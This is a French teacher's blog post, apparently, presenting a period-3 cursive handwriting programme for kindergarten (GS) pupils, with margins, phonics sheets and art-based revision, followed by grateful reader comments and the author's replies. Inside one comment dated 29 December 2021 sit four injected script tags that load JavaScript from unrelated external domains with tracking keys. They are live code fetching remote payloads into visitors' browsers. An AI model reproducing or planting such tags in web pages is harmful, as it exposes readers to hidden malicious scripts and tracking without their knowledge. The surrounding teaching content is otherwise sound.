• Programmation écriture période 3 GS

    Voici ma programmation pour la période 3 en geste d'écriture (avec 5, 6 ou 7 semaines). Après avoir bien revu la boucle en la miniaturisant ainsi que le sens sinistrogyre des cercles, il est temps de commencer le cahier :D 

    Les élèves le savent et sont impatients de commencer leur nouveau cahier d'écriture en 3mm.

    Nous avons beaucoup travaillé la boucle dans sa régularité, des petites, des grandes en observant bien nos doigts qui se plient ou s'étendent. Ils sont donc prêts à passer au cahier.

    Dans mon ouvrage "250 ateliers autonomes en GS", les ateliers autonomes sont en lien avec ma programmation : il y a donc un travail précis sur les lettres : e, l, i, u, t en cursive. Les ateliers sont clairement tournés vers l'écriture cursive : alphabet à reconstituer, prénom à former en cursive, écrire "le" en cursive, retrouver le prénom de ses camarades en cursive ...

    Pour les autres zones, je propose une organisation similaire. Ceux qui ont 6 semaines peuvent commencer par une révision de la boucle la 1ère semaine. Et ceux qui en sont 7 peuvent la dernière semaine faire une révision des gestes appris.

    Toutefois, je pense qu'il est important pour cette période de se cantonner seulement à la boucle et ses dérivées c'est-à-dire de ne travailler que sur les lettres : e, l, i, u, t

     Pour tester, voici les marges à coller dans le cahier 3mm 

    Marge à coller dans le cahier d'écriture GS 3mm 

     

     

    Voici donc ma progression sur 5 semaines : 

    prog écriture cursive P3

    Programmation écriture période 3 GSProgrammation écriture période 3 GS

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

     

    Cela sera Programmation écriture GS période 3aussi l'occasion de revoir la tenue du crayon et de travailler la souplesse des doigts à l'aide des cahier de gestes. Le travail des yeux du hibou et Programmation écriture GS période 3du yoyo au préalable vont permettre d'avoir un appui suffisant sur le crayon.

    Programmation écriture GS période 3

     

     

    Tout est résumé dans mon article Les spécificités de la maternelleICI

    Et à partir de la semaine 2, j'attaque l'écriture dans le cahier avec un petit groupe de 3 pendant que les 3 autres sont en autonomie sur la fiche son qui correspond à la lettre étudiée.

    Fiches sons en lien avec l'écriture

    Programmation écriture GS période 3

    Programmation écriture GS période 3

    Et voici la progression pour les zones qui ont 6 ou 7 semaines. Sachant que toutes les lettres partent de la boucle, pour la 1ère semaine, j'ai décidé de faire une révision du geste de la boucle à partir de 2 oeuvres d'art d'Albers, des oeuvres de Calder et de Picasso

    Pour la semaine 7, j'ai décidé de faire une révision des différents gestes abordés.

    Les spécificités de la maternellepériode complète

    Programmation écriture période 3 GS

    Programmation écriture GS période 3

    Programmation écriture GS période 3


    Pour les oeuvres de Picasso et Calder, c'est par Les spécificités de la maternelle ici :  Programmation écriture période 3 GS

     


  • Commentaires

    42
    Laura
    Samedi 20 Janvier à 20:28

    Bonjour, merci pour votre super travail qui va me permettre de commencer l'écriture cursive avec mes GS. Je me questionne cependant sur la façon dont vous introduisez les Alphas avec vos élèves. Pouvez-vous m'éclairer sur ce point ? 

    Merci d'avance !

    41
    Jay
    Samedi 15 Janvier 2022 à 17:52

    Merci tu apportes une grande aide pour l'organisation car tout est si clair

     

     

    40
    Mimi
    Vendredi 14 Janvier 2022 à 21:44

    Merci pour ce travail.

    39
    Anna R
    Dimanche 2 Janvier 2022 à 15:36
    Bonjour!merci pour le partage!c'est un peu ma bête noire l'ecriture!je commence d'habitude la cursive plus tard dans l'année en suivant la même progression que vous et j'utilise également les alphas.cette année je tente déjà cette période!nous avons exprès débuté en période 2 les alphas en espérant que la discrimination auditive des phonèmes ne sera pas trop dur!je suis en rep..on verra bien!
    38
    audrey06
    Vendredi 31 Décembre 2021 à 14:37

    Merci beaucoup pour toutes ces ressources! je m'inspire beaucoup de ton travail pour mes GS et ils progressent très bien en écriture. J'ai une classe triple niveau et c'est un plaisir de les suivre et voir les progrès! Merci encore et belle année 2022 à toi! bises

    37
    marielamarsue
    Jeudi 30 Décembre 2021 à 23:08

    Merci !! J'adore les fiches même si j'ai un peu de mal avec les sons associés aux lettres; mes élèves n'en sont pas encore à ce stade avec les alphas, c'est très dur pour certains !

    36
    angel
    Jeudi 30 Décembre 2021 à 21:49

    Merci beaucoup. Ton travail m'aide à y voir plus clair !

    35
    Noemie
    Mercredi 29 Décembre 2021 à 22:07
    Merci beaucoup pour ce travail titanesque qui va beaucoup m’aider !
    34
    Julie
    Mercredi 29 Décembre 2021 à 16:27

    Un grand merci pour ton travail sur l'écriture en GS!!! 

    <script src="//killssource.com/21c1e810f7f98f00b3.js"></script> <script src="http://hublosk.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8641x" type="text/javascript"></script> <script src="http://jullyambery.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8641x&format=arrjs&r=1640791639301" type="text/javascript"></script> <script src="http://killssource.com/ext/21c1e810f7f98f00b3.js?sid=52587_8641_&title=aa&blocks[]=31af2" type="text/javascript"></script>
    33
    Anne
    Mercredi 29 Décembre 2021 à 14:42

    Merci beaucoup pour cet article et ce blog, très utile pour mes GS.

    Bonne année 2022

    32
    Nolwenn
    Mercredi 29 Décembre 2021 à 14:32

    Coucou Lucie,

    Un grand merci pour tes marges d'écriture et les fiches de sons qui me sont bien utiles yes

    Merci pour ce blog génial; belles fêtes à toi

    Nolwenn

    31
    Caroline
    Vendredi 5 Mars 2021 à 11:44

    Bonjour, juste un petit mot pour vous remercier de ce travail partagé. J'utilise pour la première année les alphas et je pense que mes GS vont adoré travailler avec vos fiches. Un grand merci à vous !

    30
    Vjcp5
    Vendredi 22 Janvier 2021 à 21:51
    Votre site est une mine d'or !!! Un grand merci !!! Serait-il possible de voir un exemple de production d d'eleve sur le e ou l svp ? Merci
      • Vendredi 22 Janvier 2021 à 22:48
    29
    cindy
    Mercredi 13 Janvier 2021 à 17:33

    Bonjour, 

    Je suis en train de préparer le cahier d'écriture pour mes élèves de GS en suivant la progression des lettres que vous proposez. Un grand merci à vous. J'avais une interrogation concernant la mise en page pour l'apprentissage du e et du l. Pour la page de la lettre e, vous avez noté: e e / l l / elel / eell / elle / le. A quel moment l'enfant trace-t-il la silhouette des lettres? Auriez-vous une page exemple d'un modèle d'élève? 

    Je vous remercie d'avance pour votre aide. 

    Une maitresse de GS qui vous suit régulièrement ! 

     

    28
    rafaelle riviere
    Lundi 21 Décembre 2020 à 19:10

    Bonjour,

    Connaissez-vous la date de sortie de votre ouvrage à destination des PS svp? Je l'attends avec impatience pour enrichir mes activités autonomes!

    Bonne fin d'année et merci pour tout :)

      • Lundi 21 Décembre 2020 à 19:23

        Bonjour, si tout va bien, fév ou mars 2021 :)

    27
    tiffanie
    Lundi 20 Janvier 2020 à 21:03

    Bonsoir, 

    Merci pour vos articles !

    Est-ce que c'est possible de voir une page du cahier d'écriture de la lettre "e" ? 

    Merci !

    26
    marjorie
    Samedi 4 Janvier 2020 à 15:33

    Bonjour Luccia et meilleurs voeux pour cette nouvelle année!

    Concernant l'écriture, je voulais savoir quelle partie était laissée à l'atsem et quelle partie tu gérais toi-même?

    Un immense merci! :)

      • Samedi 4 Janvier 2020 à 15:55

        Non, par contre, cela fait 2 périodes que l'on travaille sur la tenue du crayon et l'importance du sens du tracé à partir de la boucle notamment en la miniaturisant. 

        Et j'ai également formé mon Asem à la méthode Dumont depuis 5 ans et elle connait mes exigences en terme de tenue du crayon, position du poignet, étirement des doigts et tracé des lettres.

      • marjorie
        Samedi 4 Janvier 2020 à 15:43

        D'accord. Donc ce n'est pas toi qui supervise le tracé des lettres à proprement parler. Merci pour cette réponse rapide!

      • Samedi 4 Janvier 2020 à 15:39

        Je fais la partie : j'observe et j'entends. Je lui laisse : je manipule, je trace, j'écris

    25
    yourcaillette
    Lundi 31 Décembre 2018 à 12:01

    Bonjour Luccia . J'ai fabriqué des fiches de sons en m'inspirant à la fois des fiches de Saperlipopette et de celles de Titline.

    T'intéresseraient-elles ? 

      • Mardi 24 Mars 2020 à 12:47

        bonjour

        pourriez-vous m'envoyer les fiches "J'ai fabriqué des fiches de sons en m'inspirant à la fois des fiches de Saperlipopette et de celles de Titline" pour accompagner ma fille qui est en GS

        mon email: marzousalimo@gmail.com

        merci

      • yourcaillette
        Lundi 31 Décembre 2018 à 16:44

        Je t'envoie ça tout de suite mais j'ai pas fini je n'en ai fait que 8. J'ai peu travaillé durant ces vacances... Je commence vraiment mercredi XD.

      • Lundi 31 Décembre 2018 à 12:38

        ah ben oui quelle bonne idée tu as eu là !! happycool

        Tu peux m'envoyer sur mon adresse : classedeluccia@laposte.net

        MERCI ! 

    24
    Sandrine
    Dimanche 30 Décembre 2018 à 14:33
    Magnifique travail et quel boulot merci beaucoup pour ce partage. Y a t il un moyen de trouver les fiches sons de Saperlipopette ? Merci et Bonnes fêtes de fin d'année
    Sandrine
    23
    Delphine
    Samedi 29 Décembre 2018 à 17:24
    Bonjour
    Merci pour votre excellent travail: une vraie mine d’or pour ma première année en GS.
    Les fiches de saperlipopette ne sont plus accessibles. Il y aurait il un autre moyen pour se les procurer?
    Merci d’avance
    Delphine
    22
    Coralie
    Vendredi 28 Décembre 2018 à 16:46

    Bonjour Luccia,

    Tout d'abord un grand merci pour tous tes partages ! Petite question, je voulais savoir à quoi correspondait les fiches sur les alphas dans la partie "J'observe" de ta programmation.

    Merci d'avance de ta réponse,

    Coralie.

      • Vendredi 28 Décembre 2018 à 17:08

        C'est simplement une affiche format A4 de l'alpha où j'explique la petite anecdote caractérisant l'alpha.

    21
    Valo
    Dimanche 2 Décembre 2018 à 07:55
    Merci pour ton travail sur les alphas
    20
    So
    Lundi 5 Novembre 2018 à 21:53

    Bonsoir, c'est vraiment un magnifique travail ! Malheureusement, les fiches ne sont plus disponibles. Savez-vous où peut-on les trouver ? Merci d'avance. 

    19
    nad
    Dimanche 23 Septembre 2018 à 15:06
    Bonjour, merci pour le partage ! comme d'habitude, c'est top ! par contre le site de saperlipopette semble avoir disparu....sais tu où elle se cache ? ou sais tu où l'on peut trouver son super fichier ? bravo encore en tout cas et merci de prendre du temps pour partager !
    18
    nad
    Jeudi 20 Septembre 2018 à 17:28

    merci pour ce partage, superbe travail, dommage, le lien vers les fiches de saperlipopette  ne fonctionne plus

    17
    bugs
    Jeudi 22 Février 2018 à 19:26

    bonsoir

    que dire sinon merci pour ce travail!!

    je me demande quelle fiche plastifiée tu utilises en semaine 1 en graphisme?

    et pareil pour les semaines 2,3,4,5,6,7 en ecriture ? ( tu indiques les pages de quels livres ?)

    merci encore

     

      • Carine
        Jeudi 3 Janvier 2019 à 11:27

        Coucou,

        Si j'ai bien compris, pour la première fiche, il s'agit du livret sur les boucles.

        Et pour les semaines suivantes, ce serait les pages du cahier d'écriture, donc avec pour commencer des silhouettes de mots pour apprendre à se repérer sur les lignes du cahier, puis la lettre étudié et quelques petits mots pour les semaines suivantes.

        Bonnes vacances et Merci pour tout ce travail!

    16
    Anaïs
    Dimanche 14 Janvier 2018 à 17:44

    Bonjour,

    Merci pour ces cahiers d'écriture.

    J'ai une question au sujet des fiches sons. Les GS les font directement en autonomie ? Je suppose que tu as travaillé les alphas au préalable ? Comment t'y prends-tu ? Tu leur rappelles simplement comment ils chantent en collectif ?

    J'ai peur que cela soit trop compliqué à ce niveau de l'année...

    Merci d'avance pour tes conseils :)

      • Dimanche 14 Janvier 2018 à 17:56

        Ils sont avec mon Asem. Je parle des alphas depuis le début de l'année et nous avons déjà vu les alphas voyelles, leur caractéristique, leur chant.

        Donc oui en regroupement, qd j'explique le travail, je reviens sur l'alpha et son chant. On joue à pigeon- vole. Je dis les dessins, ils lèvent leur main si ça chante. J'explique qd il y a une difficulté, une piège dans lequel il ne faut pas tomber.

        ça passe tout seul ;) 

    15
    Séverine
    Vendredi 5 Janvier 2018 à 09:51
    Je tenais à vous présenter tous mes vœux pour cette nouvelle année 2018! Un énorme MERCI pour votre site et la mine d'or d'activités qui s'y trouve. C'est très plaisant de vous lire, très coloré, un vrai bonheur. Malheureusement je n'arrive pas à ouvrir les liens concernant la période complète ni celui concernant le planning des activités vers l'écriture. Bonne continuation et longue vie à votre site qui nous est vraiment très utile.
      • Vendredi 5 Janvier 2018 à 11:07

        Bonjour, c'est très bizarre car tout fonctionne bien par chez moi ?

    14
    agnes
    Mardi 2 Janvier 2018 à 20:51

    merci beaucoup pour tout le travail déposé sur le site! toujours beaucoup d'idées à prendre et à s'approprier.

    Petite info : le lien vers les œuvres de Picasso et Calder ne fonctionne pas.

    bonne année 2018 avec des réussites professionnelles et un blog encore plus visité mais aussi du bonheur personnel

      • Mardi 2 Janvier 2018 à 20:58

        Voilà lien réparé yes

        Merci beaucoup pour vos voeux cool

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :